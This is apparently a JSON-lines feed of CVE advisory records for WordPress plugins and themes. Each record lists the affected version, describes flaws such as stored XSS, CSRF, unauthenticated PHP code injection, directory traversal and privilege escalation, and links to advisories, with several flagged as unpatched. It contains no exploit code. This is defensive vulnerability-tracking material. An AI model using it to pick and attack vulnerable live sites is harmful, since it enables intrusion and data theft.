{"CVE_ID":"CVE-2024-10186","slug":"event-post","versionImpact":"5.9.6","description":"The Event post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's events_cal shortcode in all versions up to, and including, 5.9.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae1c32-18a7-4109-a7ea-dfd18fa3a8e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae1c32-18a7-4109-a7ea-dfd18fa3a8e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/event-post\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/event-post\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182549\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182549\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10164","slug":"wpdm-premium-packages","versionImpact":"5.9.3","description":"The Premium Packages \u2013 Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpdmpp_pay_link shortcode in all versions up to, and including, 5.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c1758fc-5b0b-4071-b31b-1d72e34cc924?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c1758fc-5b0b-4071-b31b-1d72e34cc924?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28165","slug":"wp-backup-bank","versionImpact":"4.0.28","description":"Missing Authorization vulnerability in Tech Banker Backup Bank: WordPress Backup Plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backup Bank: WordPress Backup Plugin: from n\/a through 4.0.28.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-backup-bank\\\/vulnerability\\\/wordpress-backup-bank-wordpress-backup-plugin-plugin-4-0-28-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-backup-bank\\\/vulnerability\\\/wordpress-backup-bank-wordpress-backup-plugin-plugin-4-0-28-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13057","slug":"dyn-business-panel","versionImpact":"1.0.0","description":"The Dyn Business Panel WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13639","slug":"expand-maker","versionImpact":"3.4.2","description":"The Read More & Accordion plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the expmDeleteData() function in all versions up to, and including, 3.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary 'read more' posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/files\\\/ReadMoreAdminPost.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/expand-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/expand-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65849267-8bb5-48fd-b95e-e89a1e744fe0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65849267-8bb5-48fd-b95e-e89a1e744fe0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12810","slug":"jobcareer","versionImpact":"7.1","description":"The JobCareer | Job Board Responsive WordPress Theme theme for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability checks on multiple functions in all versions up to, and including, 7.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files, generate backups, restore backups, update theme options, and reset theme options to default settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24889552-0db6-44e6-9b12-f31b5e92a42e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24889552-0db6-44e6-9b12-f31b5e92a42e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7174","slug":"abitgone-commentsafe","versionImpact":"1.0.0","description":"The aBitGone CommentSafe WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c1c6d61-5588-4c21-95f6-2818c4f5c355\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c1c6d61-5588-4c21-95f6-2818c4f5c355\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6781","slug":"copymatic","versionImpact":"2.1","description":"The Copymatic \u2013 AI Content Writer & Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on the 'copymatic-menu' page. This makes it possible for unauthenticated attackers to update the copymatic_apikey option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/copymatic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/copymatic\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f18b1276-3f43-447d-8251-095c2dd57938?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f18b1276-3f43-447d-8251-095c2dd57938?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8723","slug":"cf-image-resizing","versionImpact":"1.5.6","description":"The Cloudflare Image Resizing plugin for WordPress is vulnerable to Remote Code Execution due to missing authentication and insufficient sanitization within its hook_rest_pre_dispatch() method in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to inject arbitrary PHP into the codebase, achieving remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337593\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337593\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf-image-resizing\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf-image-resizing\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f3b3c1a-1d45-4e2f-854a-171fe759257b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f3b3c1a-1d45-4e2f-854a-171fe759257b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4330","slug":"template-kit-import","versionImpact":"1.0.13","description":"The Envato Elements & Download and Template Kit \u2013 Import plugins for WordPress are vulnerable to arbitrary file uploads due to insufficient validation of file type upon extracting uploaded Zip files in the installFreeTemplateKit and uploadTemplateKitZipFile functions. This makes it possible for attackers with contributor-level permissions and above to upload arbitrary files and potentially gain remote code execution in versions up to and including 1.0.13 of Template Kit \u2013 Import and versions up to and including 2.0.10 of Envato Elements & Download.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25144","slug":"wp-email-template","versionImpact":"2.2.10","description":"The WP HTML Mail plugin for WordPress is vulnerable to HTML injection in versions up to, and including, 2.2.10 due to insufficient input sanitization. This makes it possible for unauthenticated attackers to inject arbitrary HTML in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/946ba166-3309-4e47-8b6b-d3f017bbfcc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/946ba166-3309-4e47-8b6b-d3f017bbfcc8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2495","slug":"greeklish-permalink","versionImpact":"3.3","description":"The Greeklish-permalink WordPress plugin through 3.3 does not implement correct authorization or nonce checks in the cyrtrans_ajax_old AJAX action, allowing unauthenticated and low-privilege users to trigger the plugin's functionality to change Post slugs either directly or through CSRF.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45878983-7e9b-49c2-8f99-4c28aab24f09\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45878983-7e9b-49c2-8f99-4c28aab24f09\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5565","slug":"shortcode-menu","versionImpact":"3.2","description":"The Shortcode Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shortmenu' shortcode in versions up to, and including, 3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/438b9c13-4059-4671-ab4a-07a8cf6f6122?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/438b9c13-4059-4671-ab4a-07a8cf6f6122?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-menu\\\/tags\\\/3.2\\\/shortcode-menu.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-menu\\\/tags\\\/3.2\\\/shortcode-menu.php#L183\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5724","slug":"photo-video-gallery-master","versionImpact":"1.5.3","description":"The Photo Video Gallery Master plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5.3 via deserialization of untrusted input 'PVGM_all_photos_details' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8376556e-ed78-4a0e-a23f-9b2a39db94d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8376556e-ed78-4a0e-a23f-9b2a39db94d9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-video-gallery-master\\\/trunk\\\/photo-video-gallery-master.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-video-gallery-master\\\/trunk\\\/photo-video-gallery-master.php#L301\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8276","slug":"wpzoom-portfolio","versionImpact":"1.4.4","description":"The WPZOOM Portfolio Lite \u2013 Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-portfolio\\\/trunk\\\/build\\\/blocks\\\/portfolio-layouts\\\/index.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-portfolio\\\/trunk\\\/build\\\/blocks\\\/portfolio-layouts\\\/index.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-portfolio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-portfolio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144394\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4541","slug":"nm-visitors","versionImpact":"1.0","description":"The WordPress Visitors plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a spoofed HTTP Header value in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the nm_vistior page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa15c0a4-c99d-40c9-a654-f3a910460502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa15c0a4-c99d-40c9-a654-f3a910460502?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L63\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8323","slug":"easy-pricing-tables","versionImpact":"3.2.6","description":"The Pricing Tables WordPress Plugin \u2013 Easy Pricing Tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018fontFamily\u2019 attribute in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fb1fd3-16aa-467f-b5f6-a6126b05e088?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fb1fd3-16aa-467f-b5f6-a6126b05e088?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-pricing-tables\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-pricing-tables\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181961\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181961\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11297","slug":"page-and-post-restriction","versionImpact":"1.3.6","description":"The Page Restriction WordPress (WP) \u2013 Protect WP Pages\/Post plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.6 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/page-and-post-restriction\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/page-and-post-restriction\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d12ab8c-d5d0-4e02-986e-e894fae073e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d12ab8c-d5d0-4e02-986e-e894fae073e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5769","slug":"mimo-woocommerce-order-tracking","versionImpact":"1.0.2","description":"The MIMO Woocommerce Order Tracking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add, update, and delete shipper tracking settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47c666b1-1ac2-4764-bbee-385ec321a580?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47c666b1-1ac2-4764-bbee-385ec321a580?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13056","slug":"dyn-business-panel","versionImpact":"1.0.0","description":"The Dyn Business Panel WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4335","slug":"woocommerce-multiple-addresses","versionImpact":"1.0.7.1","description":"The Woocommerce Multiple Addresses plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.7.1. This is due to insufficient restrictions on user meta that can be updated through the save_multiple_shipping_addresses() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-addresses\\\/trunk\\\/class-woocommerce-multiple-addresses.php#L522\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-addresses\\\/trunk\\\/class-woocommerce-multiple-addresses.php#L522\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95e74e70-9dc9-4e63-b371-fd2a38692907?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95e74e70-9dc9-4e63-b371-fd2a38692907?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7168","slug":"better-follow-button-for-jetpack","versionImpact":"8.0","description":"The Better Follow Button for Jetpack WordPress plugin through 8.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/715ded45-04ee-40c1-8acb-bd40d0fe30ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/715ded45-04ee-40c1-8acb-bd40d0fe30ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4187","slug":"userpro","versionImpact":"5.1.10","description":"The UserPro - Community and User Profile WordPress Plugin plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 5.1.10 via the userpro_fbconnect() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2745a40c-b011-4fe5-b2f7-d97ee6972568?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2745a40c-b011-4fe5-b2f7-d97ee6972568?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
